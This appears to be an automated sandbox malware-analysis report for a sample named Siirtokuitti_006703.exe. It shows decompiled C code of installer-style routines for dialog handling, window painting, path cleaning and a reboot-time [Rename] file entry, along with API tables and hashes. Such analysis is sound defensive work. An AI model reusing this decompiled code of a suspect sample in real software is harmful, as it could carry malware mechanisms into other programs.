                                                                                                                      								_push("true");
                                                                                                                      								E00404791(_a4, _v8);
                                                                                                                      								SetCursor(LoadCursorW(0, 0x7f00));
                                                                                                                      								_t114 = _a16;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                                                                                      							goto L28;
                                                                                                                      						} else {
                                                                                                                      							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                                                                                      								SendMessageW( *0x42a248, 0x111, "true", 0);
                                                                                                                      							}
                                                                                                                      							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                                                                                      								SendMessageW( *0x42a248, 0x10, 0, 0);
                                                                                                                      							}
                                                                                                                      							return 1;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					if(_a12 >> 0x10 != 0 ||  *0x4216f4 != 0) {
                                                                                                                      						goto L27;
                                                                                                                      					} else {
                                                                                                                      						_t116 =  *0x422700 + 0x14;
                                                                                                                      						if(( *_t116 & 0x00000020) == 0) {
                                                                                                                      							goto L27;
                                                                                                                      						}
                                                                                                                      						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                                                      						E00404367(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                                                      						E0040476D();
                                                                                                                      						goto L13;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				_t117 = _a16;
                                                                                                                      				_t75 =  *(_t117 + 0x30);
                                                                                                                      				if(_t75 < 0) {
                                                                                                                      					_t75 =  *( *0x42921c - 4 + _t75 * 4);
                                                                                                                      				}
                                                                                                                      				_t76 =  *0x42a298 + _t75 * 2;
                                                                                                                      				_t110 =  *_t76 & 0x0000ffff;
                                                                                                                      				_a8 = _t110;
                                                                                                                      				_t78 =  &(_t76[1]);
                                                                                                                      				_a16 = _t78;
                                                                                                                      				_v16 = _t78;
                                                                                                                      				_v12 = 0;
                                                                                                                      				_v8 = E00404493;
                                                                                                                      				if(_t110 != 2) {
                                                                                                                      					_v8 = E00404459;
                                                                                                                      				}
                                                                                                                      				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                                                                                      				_push(0x22);
                                                                                                                      				E00404345(_a4);
                                                                                                                      				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                                                                                      				_push(0x23);
                                                                                                                      				E00404345(_a4);
                                                                                                                      				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, "true");
                                                                                                                      				E00404367( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                                                                                      				_t118 = GetDlgItem(_a4, 0x3e8);
                                                                                                                      				E0040437A(_t118);
                                                                                                                      				SendMessageW(_t118, 0x45b, "true", 0);
                                                                                                                      				_t92 =  *( *0x42a254 + 0x68);
                                                                                                                      				if(_t92 < 0) {
                                                                                                                      					_t92 = GetSysColor( ~_t92);
                                                                                                                      				}
                                                                                                                      				SendMessageW(_t118, 0x443, 0, _t92);
                                                                                                                      				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                                                                                      				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                                                                                      				 *0x4216f4 = 0;
                                                                                                                      				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                                                                                      				 *0x4216f4 = 0;
                                                                                                                      				return 0;
                                                                                                                      			}


















                                                                                                                      0x004044f4
                                                                                                                      0x00404621
                                                                                                                      0x0040467e
                                                                                                                      0x00404682
                                                                                                                      0x0040474f
                                                                                                                      0x00404751
                                                                                                                      0x00404751
                                                                                                                      0x00404757
                                                                                                                      0x00404757
                                                                                                                      0x0040475a
                                                                                                                      0x00000000
                                                                                                                      0x00404761
                                                                                                                      0x00404690
                                                                                                                      0x00404696
                                                                                                                      0x004046a0
                                                                                                                      0x004046ab
                                                                                                                      0x004046ae
                                                                                                                      0x004046b1
                                                                                                                      0x004046bc
                                                                                                                      0x004046bf
                                                                                                                      0x004046c6
                                                                                                                      0x004046d3
                                                                                                                      0x004046e4
                                                                                                                      0x004046ea
                                                                                                                      0x004046f2
                                                                                                                      0x00404700
                                                                                                                      0x00404706
                                                                                                                      0x00404706
                                                                                                                      0x004046c6
                                                                                                                      0x00404710
                                                                                                                      0x00000000
                                                                                                                      0x0040471b
                                                                                                                      0x0040471f
                                                                                                                      0x0040472f
                                                                                                                      0x0040472f
                                                                                                                      0x00404735
                                                                                                                      0x00404741
                                                                                                                      0x00404741
                                                                                                                      0x00000000
                                                                                                                      0x00404745
                                                                                                                      0x00404710
                                                                                                                      0x0040462c
                                                                                                                      0x00000000
                                                                                                                      0x0040463e
                                                                                                                      0x00404643
                                                                                                                      0x00404649
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00404672
                                                                                                                      0x00404674
                                                                                                                      0x00404679
                                                                                                                      0x00000000
                                                                                                                      0x00404679
                                                                                                                      0x0040462c
                                                                                                                      0x004044fa
                                                                                                                      0x004044fd
                                                                                                                      0x00404502
                                                                                                                      0x00404513
                                                                                                                      0x00404513
                                                                                                                      0x0040451b
                                                                                                                      0x0040451e
                                                                                                                      0x00404522
                                                                                                                      0x00404525
                                                                                                                      0x00404529
                                                                                                                      0x0040452c
                                                                                                                      0x0040452f
                                                                                                                      0x00404532
                                                                                                                      0x00404539
                                                                                                                      0x0040453b
                                                                                                                      0x0040453b
                                                                                                                      0x00404545
                                                                                                                      0x00404552
                                                                                                                      0x0040455c
                                                                                                                      0x00404561
                                                                                                                      0x00404564
                                                                                                                      0x00404569
                                                                                                                      0x00404580
                                                                                                                      0x00404587
                                                                                                                      0x0040459a
                                                                                                                      0x0040459d
                                                                                                                      0x004045b1
                                                                                                                      0x004045b8
                                                                                                                      0x004045bd
                                                                                                                      0x004045c2
                                                                                                                      0x004045c2
                                                                                                                      0x004045d0
                                                                                                                      0x004045de
                                                                                                                      0x004045f0
                                                                                                                      0x004045f5
                                                                                                                      0x00404605
                                                                                                                      0x00404607
                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                      • CheckDlgButton.USER32(?,-0000040A,?), ref: 00404580
                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404594
                                                                                                                      • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004045B1
                                                                                                                      • GetSysColor.USER32(?), ref: 004045C2
                                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045D0
                                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045DE
                                                                                                                      • lstrlenW.KERNEL32(?), ref: 004045E3
                                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004045F0
                                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404605
                                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040465E
                                                                                                                      • SendMessageW.USER32(00000000), ref: 00404665
                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404690
                                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046D3
                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004046E1
                                                                                                                      • SetCursor.USER32(00000000), ref: 004046E4
                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004046FD
                                                                                                                      • SetCursor.USER32(00000000), ref: 00404700
                                                                                                                      • SendMessageW.USER32(00000111,?,00000000), ref: 0040472F
                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404741
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                      • String ID: Call$N$YD@
                                                                                                                      • API String ID: 3103080414-3276248472
                                                                                                                      • Opcode ID: 777072e4300f85645cf7ffde5545d8883defabb32dd208014d98b1e23baa6229
                                                                                                                      • Instruction ID: b733f22c3e4a4344af423a89e947fb2470a434e6d87e1c723dfed1fecd84da00
                                                                                                                      • Opcode Fuzzy Hash: 777072e4300f85645cf7ffde5545d8883defabb32dd208014d98b1e23baa6229
                                                                                                                      • Instruction Fuzzy Hash: E16172B1A00209BFDB109F60DD85AAA7B69FB85354F00813AFB05BB1E0D7789951CF58
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                                                      				struct tagLOGBRUSH _v16;
                                                                                                                      				struct tagRECT _v32;
                                                                                                                      				struct tagPAINTSTRUCT _v96;
                                                                                                                      				struct HDC__* _t70;
                                                                                                                      				struct HBRUSH__* _t87;
                                                                                                                      				struct HFONT__* _t94;
                                                                                                                      				long _t102;
                                                                                                                      				signed int _t126;
                                                                                                                      				struct HDC__* _t128;
                                                                                                                      				intOrPtr _t130;
                                                                                                                      
                                                                                                                      				if(_a8 == 0xf) {
                                                                                                                      					_t130 =  *0x42a254;
                                                                                                                      					_t70 = BeginPaint(_a4,  &_v96);
                                                                                                                      					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                                                      					_a8 = _t70;
                                                                                                                      					GetClientRect(_a4,  &_v32);
                                                                                                                      					_t126 = _v32.bottom;
                                                                                                                      					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                                                      					while(_v32.top < _t126) {
                                                                                                                      						_a12 = _t126 - _v32.top;
                                                                                                                      						asm("cdq");
                                                                                                                      						asm("cdq");
                                                                                                                      						asm("cdq");
                                                                                                                      						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                                                      						_t87 = CreateBrushIndirect( &_v16);
                                                                                                                      						_v32.bottom = _v32.bottom + 4;
                                                                                                                      						_a16 = _t87;
                                                                                                                      						FillRect(_a8,  &_v32, _t87);
                                                                                                                      						DeleteObject(_a16);
                                                                                                                      						_v32.top = _v32.top + 4;
                                                                                                                      					}
                                                                                                                      					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                                                      						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                                                                                      						_a16 = _t94;
                                                                                                                      						if(_t94 != 0) {
                                                                                                                      							_t128 = _a8;
                                                                                                                      							_v32.left = 0x10;
                                                                                                                      							_v32.top = 8;
                                                                                                                      							SetBkMode(_t128, "true");
                                                                                                                      							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                                                      							_a8 = SelectObject(_t128, _a16);
                                                                                                                      							DrawTextW(_t128, 0x429240, 0xffffffff,  &_v32, 0x820);
                                                                                                                      							SelectObject(_t128, _a8);
                                                                                                                      							DeleteObject(_a16);
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					EndPaint(_a4,  &_v96);
                                                                                                                      					return 0;
                                                                                                                      				}
                                                                                                                      				_t102 = _a16;
                                                                                                                      				if(_a8 == 0x46) {
                                                                                                                      					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                                                      					 *((intOrPtr*)(_t102 + 4)) =  *0x42a248;
                                                                                                                      				}
                                                                                                                      				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                                                                                      			}













                                                                                                                      0x0040100a
                                                                                                                      0x00401039
                                                                                                                      0x00401047
                                                                                                                      0x0040104d
                                                                                                                      0x00401051
                                                                                                                      0x0040105b
                                                                                                                      0x00401061
                                                                                                                      0x00401064
                                                                                                                      0x004010f3
                                                                                                                      0x00401089
                                                                                                                      0x0040108c
                                                                                                                      0x004010a6
                                                                                                                      0x004010bd
                                                                                                                      0x004010cc
                                                                                                                      0x004010cf
                                                                                                                      0x004010d5
                                                                                                                      0x004010d9
                                                                                                                      0x004010e4
                                                                                                                      0x004010ed
                                                                                                                      0x004010ef
                                                                                                                      0x004010ef
                                                                                                                      0x00401100
                                                                                                                      0x00401105
                                                                                                                      0x0040110d
                                                                                                                      0x00401110
                                                                                                                      0x00401112
                                                                                                                      0x00401118
                                                                                                                      0x0040111f
                                                                                                                      0x00401126
                                                                                                                      0x00401130
                                                                                                                      0x00401142
                                                                                                                      0x00401156
                                                                                                                      0x00401160
                                                                                                                      0x00401165
                                                                                                                      0x00401165
                                                                                                                      0x00401110
                                                                                                                      0x0040116e
                                                                                                                      0x00000000
                                                                                                                      0x00401178
                                                                                                                      0x00401010
                                                                                                                      0x00401013
                                                                                                                      0x00401015
                                                                                                                      0x0040101f
                                                                                                                      0x0040101f
                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                      • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                      • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                      • String ID: F
                                                                                                                      • API String ID: 941294808-1304234792
                                                                                                                      • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                                      • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                                      • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                                      • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00405FFC(void* __ecx) {
                                                                                                                      				void* __ebx;
                                                                                                                      				void* __edi;
                                                                                                                      				void* __esi;
                                                                                                                      				long _t12;
                                                                                                                      				long _t24;
                                                                                                                      				char* _t31;
                                                                                                                      				int _t37;
                                                                                                                      				void* _t38;
                                                                                                                      				intOrPtr* _t39;
                                                                                                                      				long _t42;
                                                                                                                      				WCHAR* _t44;
                                                                                                                      				void* _t46;
                                                                                                                      				void* _t48;
                                                                                                                      				void* _t49;
                                                                                                                      				void* _t52;
                                                                                                                      				void* _t53;
                                                                                                                      
                                                                                                                      				_t38 = __ecx;
                                                                                                                      				_t44 =  *(_t52 + 0x14);
                                                                                                                      				 *0x426dc8 = 0x55004e;
                                                                                                                      				 *0x426dcc = 0x4c;
                                                                                                                      				if(_t44 == 0) {
                                                                                                                      					L3:
                                                                                                                      					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x4275c8, 0x400);
                                                                                                                      					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                                                      						_t37 = wsprintfA(0x4269c8, "%ls=%ls\r\n", 0x426dc8, 0x4275c8);
                                                                                                                      						_t53 = _t52 + 0x10;
                                                                                                                      						E004063D2(_t37, 0x400, 0x4275c8, 0x4275c8,  *((intOrPtr*)( *0x42a254 + 0x128)));
                                                                                                                      						_t12 = E00405EA2(0x4275c8, 0xc0000000, 4);
                                                                                                                      						_t48 = _t12;
                                                                                                                      						 *(_t53 + 0x18) = _t48;
                                                                                                                      						if(_t48 != 0xffffffff) {
                                                                                                                      							_t42 = GetFileSize(_t48, 0);
                                                                                                                      							_t6 = _t37 + 0xa; // 0xa
                                                                                                                      							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                                                                      							if(_t46 == 0 || E00405F25(_t48, _t46, _t42) == 0) {
                                                                                                                      								L18:
                                                                                                                      								return CloseHandle(_t48);
                                                                                                                      							} else {
                                                                                                                      								if(E00405E07(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                                                                      									_t49 = E00405E07(_t38, _t21 + 0xa, "\n[");
                                                                                                                      									if(_t49 == 0) {
                                                                                                                      										_t48 =  *(_t53 + 0x18);
                                                                                                                      										L16:
                                                                                                                      										_t24 = _t42;
                                                                                                                      										L17:
                                                                                                                      										E00405E5D(_t24 + _t46, 0x4269c8, _t37);
                                                                                                                      										SetFilePointer(_t48, 0, 0, 0);
                                                                                                                      										E00405F54(_t48, _t46, _t42 + _t37);
                                                                                                                      										GlobalFree(_t46);
                                                                                                                      										goto L18;
                                                                                                                      									}
                                                                                                                      									_t39 = _t46 + _t42;
                                                                                                                      									_t31 = _t39 + _t37;
                                                                                                                      									while(_t39 > _t49) {
                                                                                                                      										 *_t31 =  *_t39;
                                                                                                                      										_t31 = _t31 - 1;
                                                                                                                      										_t39 = _t39 - 1;
                                                                                                                      									}
                                                                                                                      									_t24 = _t49 - _t46 + 1;
                                                                                                                      									_t48 =  *(_t53 + 0x18);
                                                                                                                      									goto L17;
                                                                                                                      								}
                                                                                                                      								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                                                                      								_t42 = _t42 + 0xa;
                                                                                                                      								goto L16;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      				} else {
                                                                                                                      					CloseHandle(E00405EA2(_t44, 0, "true"));
                                                                                                                      					_t12 = GetShortPathNameW(_t44, 0x426dc8, 0x400);
                                                                                                                      					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                                                      						goto L3;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				return _t12;
                                                                                                                      			}



















                                                                                                                      0x00405ffc
                                                                                                                      0x00406005
                                                                                                                      0x0040600c
                                                                                                                      0x00406016
                                                                                                                      0x0040602a
                                                                                                                      0x00406052
                                                                                                                      0x0040605d
                                                                                                                      0x00406061
                                                                                                                      0x00406081
                                                                                                                      0x00406088
                                                                                                                      0x00406092
                                                                                                                      0x0040609f
                                                                                                                      0x004060a4
                                                                                                                      0x004060a9
                                                                                                                      0x004060ad
                                                                                                                      0x004060bc
                                                                                                                      0x004060be
                                                                                                                      0x004060cb
                                                                                                                      0x004060cf
                                                                                                                      0x0040616a
                                                                                                                      0x00000000
                                                                                                                      0x004060e5
                                                                                                                      0x004060f2
                                                                                                                      0x00406116
                                                                                                                      0x0040611a
                                                                                                                      0x00406139
                                                                                                                      0x0040613d
                                                                                                                      0x0040613d
                                                                                                                      0x0040613f
                                                                                                                      0x00406148
                                                                                                                      0x00406153
                                                                                                                      0x0040615e
                                                                                                                      0x00406164
                                                                                                                      0x00000000
                                                                                                                      0x00406164
                                                                                                                      0x0040611c
                                                                                                                      0x0040611f
                                                                                                                      0x0040612a
                                                                                                                      0x00406126
                                                                                                                      0x00406128
                                                                                                                      0x00406129
                                                                                                                      0x00406129
                                                                                                                      0x00406131
                                                                                                                      0x00406133
                                                                                                                      0x00000000
                                                                                                                      0x00406133
                                                                                                                      0x004060fd
                                                                                                                      0x00406103
                                                                                                                      0x00000000
                                                                                                                      0x00406103
                                                                                                                      0x004060cf
                                                                                                                      0x004060ad
                                                                                                                      0x0040602c
                                                                                                                      0x00406037
                                                                                                                      0x00406040
                                                                                                                      0x00406044
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406044
                                                                                                                      0x00406175

                                                                                                                      APIs
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406197,?,?), ref: 00406037
                                                                                                                      • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406040
                                                                                                                        • Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
                                                                                                                        • Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49
                                                                                                                      • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 0040605D
                                                                                                                      • wsprintfA.USER32 ref: 0040607B
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060B6
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060C5
                                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FD
                                                                                                                      • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 00406153
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00406164
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040616B
                                                                                                                        • Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\Siirtokuitti_006703.exe,80000000,00000003), ref: 00405EA6
                                                                                                                        • Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405EC8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                      • String ID: %ls=%ls$[Rename]
                                                                                                                      • API String ID: 2171350718-461813615
                                                                                                                      • Opcode ID: cc1e011b744674eb6045294d1f1ba8016b3cffab7c6b3a5cc0e4edd922729f6b
                                                                                                                      • Instruction ID: 7a97944e4ecdd21f919348e7cfc29446421eaa6be6f71a8f5a2bdcac5b6ce208
                                                                                                                      • Opcode Fuzzy Hash: cc1e011b744674eb6045294d1f1ba8016b3cffab7c6b3a5cc0e4edd922729f6b
                                                                                                                      • Instruction Fuzzy Hash: 953139703007157BC2206B259D49F673A6CEF45714F15003AFA42FA2D2DE7C992586AD
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E00406644(WCHAR* _a4) {
                                                                                                                      				short _t5;
                                                                                                                      				short _t7;
                                                                                                                      				WCHAR* _t19;
                                                                                                                      				WCHAR* _t20;
                                                                                                                      				WCHAR* _t21;
                                                                                                                      
                                                                                                                      				_t20 = _a4;
                                                                                                                      				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                                                                                      					_t20 =  &(_t20[4]);
                                                                                                                      				}
                                                                                                                      				if( *_t20 != 0 && E00405CF8(_t20) != 0) {
                                                                                                                      					_t20 =  &(_t20[2]);
                                                                                                                      				}
                                                                                                                      				_t5 =  *_t20;
                                                                                                                      				_t21 = _t20;
                                                                                                                      				_t19 = _t20;
                                                                                                                      				if(_t5 != 0) {
                                                                                                                      					do {
                                                                                                                      						if(_t5 > 0x1f &&  *((short*)(E00405CAE(L"*?|<>/\":", _t5))) == 0) {
                                                                                                                      							E00405E5D(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                                                                                      							_t19 = CharNextW(_t19);
                                                                                                                      						}
                                                                                                                      						_t20 = CharNextW(_t20);
                                                                                                                      						_t5 =  *_t20;
                                                                                                                      					} while (_t5 != 0);
                                                                                                                      				}
                                                                                                                      				 *_t19 =  *_t19 & 0x00000000;
                                                                                                                      				while(1) {
                                                                                                                      					_push(_t19);
                                                                                                                      					_push(_t21);
                                                                                                                      					_t19 = CharPrevW();
                                                                                                                      					_t7 =  *_t19;
                                                                                                                      					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                                                      						break;
                                                                                                                      					}
                                                                                                                      					 *_t19 =  *_t19 & 0x00000000;
                                                                                                                      					if(_t21 < _t19) {
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					break;
                                                                                                                      				}
                                                                                                                      				return _t7;
                                                                                                                      			}








                                                                                                                      0x00406646
